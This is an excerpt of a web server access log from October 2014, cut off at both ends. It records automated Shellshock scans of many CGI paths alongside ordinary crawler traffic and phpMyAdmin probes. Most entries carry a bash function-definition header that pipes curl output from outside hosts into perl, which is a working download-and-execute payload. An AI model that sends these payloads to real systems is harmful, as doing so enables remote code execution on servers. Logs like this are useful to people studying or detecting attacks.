curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:26 +0200] "GET /cgi-bin/htsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:26 +0200] "GET /cgi-bin/html2wml.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:28 +0200] "GET /cgi-bin/hitview.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:32 +0200] "GET /cgi-bin/gm.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:33 +0200] "GET /cgi-bin/gm-authors.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:33 +0200] "GET /cgi-bin/gH.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:35 +0200] "GET /cgi-bin/generate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:35 +0200] "GET /cgi-bin/gbook/gbook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:36 +0200] "GET /cgi-bin/FormMail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:36 +0200] "GET /cgi-bin/FormHandler.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:39 +0200] "GET /cgi-bin/finger.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:40 +0200] "GET /cgi-bin/FileSeek.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:41 +0200] "GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:45 +0200] "GET /cgi-bin/ezboard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:46 +0200] "GET /cgi-bin/ezadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:48 +0200] "GET /cgi-bin/emumail/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:49 +0200] "GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:49 +0200] "GET /cgi-bin/download.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:49 +0200] "GET /cgi-bin/directorypro.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:49 +0200] "GET /cgi-bin/dig.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:50 +0200] "GET /cgi-bin/dfire.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:54 +0200] "GET /cgi-bin/day5datanotifier.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:54 +0200] "GET /cgi-bin/day5datacopier.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:56 +0200] "GET /cgi-bin/cvslog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:38:58 +0200] "GET /cgi-bin/csv_db.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:00 +0200] "GET /cgi-bin/csPassword.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:08 +0200] "GET /cgi-bin/compatible.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:12 +0200] "GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:13 +0200] "GET /cgi-bin/classified.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:18 +0200] "GET /cgi-bin/cartmanager.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:25 +0200] "GET /cgi-bin/bsguest.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:25 +0200] "GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:26 +0200] "GET /cgi-bin/book.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:43 +0200] "GET /cgi-bin/ax.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:43 +0200] "GET /cgi-bin/ax-admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:43 +0200] "GET /cgi-bin/auktion.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:43 +0200] "GET /cgi-bin/auction/auction.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:44 +0200] "GET /cgi-bin/AT-admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:47 +0200] "GET /cgi-bin/alienform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:47 +0200] "GET /cgi-bin/aglimpse.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:52 +0200] "GET /cgi-bin/admin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:52 +0200] "GET /cgi-bin/admin.plHTTP/1.0" 503 323 "-" "-" +78.31.104.8 - - [31/Oct/2014:07:39:58 +0200] "GET /cgi-bin/a1disp3.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:39:59 +0200] "GET /cgi-bin/14all.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:40:05 +0200] "GET /cgi-bin-sdb/printenvHTTP/1.0" 404 226 "-" "-" +78.31.104.8 - - [31/Oct/2014:07:40:07 +0200] "GET /cartcart.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:40:07 +0200] "GET /cart.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:40:07 +0200] "GET /bigconf.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:40:13 +0200] "GET /agora.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:40:14 +0200] "GET /administrator.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:40:14 +0200] "GET /admin.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +78.31.104.8 - - [31/Oct/2014:07:40:14 +0200] "GET /_mt/mt.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +123.125.71.75 - - [31/Oct/2014:08:31:04 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.178 - - [31/Oct/2014:08:32:20 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.145 - - [31/Oct/2014:09:24:21 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.113 - - [31/Oct/2014:09:24:52 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +194.63.140.244 - - [31/Oct/2014:09:57:26 +0200] "GET / HTTP/1.1" 200 460 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" +194.63.140.244 - - [31/Oct/2014:09:57:26 +0200] "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" +194.63.140.244 - - [31/Oct/2014:09:57:26 +0200] "GET /HNAP1/ HTTP/1.1" 404 388 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" +220.181.108.159 - - [31/Oct/2014:10:20:06 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.85 - - [31/Oct/2014:10:24:34 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.159 - - [31/Oct/2014:11:05:25 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.105 - - [31/Oct/2014:11:07:59 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.143 - - [31/Oct/2014:12:13:58 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.88 - - [31/Oct/2014:12:14:11 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +88.7.26.146 - - [31/Oct/2014:12:21:51 +0200] "GET /ftp/public/pictures/gallery/IMG_0103.jpg HTTP/1.1" 200 930972 "https://www.google.es/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" +128.194.135.99 - - [31/Oct/2014:13:05:44 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)" +123.125.71.111 - - [31/Oct/2014:13:07:28 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.153 - - [31/Oct/2014:13:08:38 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.114 - - [31/Oct/2014:14:10:21 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.169 - - [31/Oct/2014:14:11:30 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +207.46.13.106 - - [31/Oct/2014:14:40:50 +0200] "GET /ftp/public/pictures/gallery/tern01_rdct.jpg HTTP/1.1" 200 88187 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +123.125.71.69 - - [31/Oct/2014:15:04:52 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.150 - - [31/Oct/2014:15:06:04 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.110 - - [31/Oct/2014:16:01:07 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.79 - - [31/Oct/2014:16:02:23 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.99 - - [31/Oct/2014:17:02:36 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.143 - - [31/Oct/2014:17:03:15 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.98 - - [31/Oct/2014:18:08:34 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.184 - - [31/Oct/2014:18:09:56 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +149.129.65.186 - - [31/Oct/2014:18:11:26 +0200] "GET /tmUnblock.cgi HTTP/1.1" 400 431 "-" "-" +123.125.71.100 - - [31/Oct/2014:19:43:03 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.147 - - [31/Oct/2014:19:44:45 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.102 - - [31/Oct/2014:20:41:28 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.156 - - [31/Oct/2014:20:42:40 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +189.132.99.51 - - [31/Oct/2014:21:33:03 +0200] "GET /pxpx/pxp/px.php HTTP/1.1" 404 416 "-" "-" +189.132.99.51 - - [31/Oct/2014:21:33:04 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +189.132.99.51 - - [31/Oct/2014:21:33:04 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +189.132.99.51 - - [31/Oct/2014:21:33:05 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +46.36.35.233 - - [31/Oct/2014:22:28:02 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +198.27.100.229 - - [31/Oct/2014:22:43:06 +0200] "GET /uyuy/uyu/uy.php HTTP/1.1" 404 416 "-" "-" +198.27.100.229 - - [31/Oct/2014:22:43:07 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +198.27.100.229 - - [31/Oct/2014:22:43:07 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +198.27.100.229 - - [31/Oct/2014:22:43:07 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +123.125.71.100 - - [31/Oct/2014:23:12:48 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +203.162.54.69 - - [31/Oct/2014:23:30:10 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:30:10 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:30:14 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:12 +0200] "GET /cgi-bin/ HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:15 +0200] "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:17 +0200] "GET /xul/ HTTP/1.0" 404 442 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:18 +0200] "GET /cgi-bin/status HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:19 +0200] "GET /gitweb/ HTTP/1.0" 404 445 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:20 +0200] "GET /gitweb.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:24 +0200] "GET /cgi-bin/php5 HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:24 +0200] "GET /cgi-bin/php4 HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:25 +0200] "GET /cgi-bin/php-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:29 +0200] "GET /cgi-bin/admin.html HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:29 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:31 +0200] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0" 404 474 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:33 +0200] "GET /cgi-bin/ICuGI/EST/blast_detail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:33 +0200] "GET /cgi-bin/hello HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:34 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:36 +0200] "GET /cgi-bin/status/status.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:36 +0200] "GET /wwwboard/wwwboard.cgi HTTP/1.0" 404 459 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:37 +0200] "GET /wwwboard.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:38 +0200] "GET /wwwadmin.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:39 +0200] "GET /webtools/bonsai/showcheckins.cgi HTTP/1.0" 404 470 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:39 +0200] "GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0" 404 470 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:40 +0200] "GET /webtools/bonsai/cvsquery.cgi HTTP/1.0" 404 466 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:43 +0200] "GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0" 404 467 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:43 +0200] "GET /Web_Store/web_store.cgi HTTP/1.0" 404 461 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:44 +0200] "GET /users/scripts/submit.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:47 +0200] "GET /tmUnblock.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:47 +0200] "GET /test.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:48 +0200] "GET /template.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:49 +0200] "GET /technote/print.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:49 +0200] "GET /submit.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:50 +0200] "GET /siteUserMod.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:57 +0200] "GET /scancfg.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl 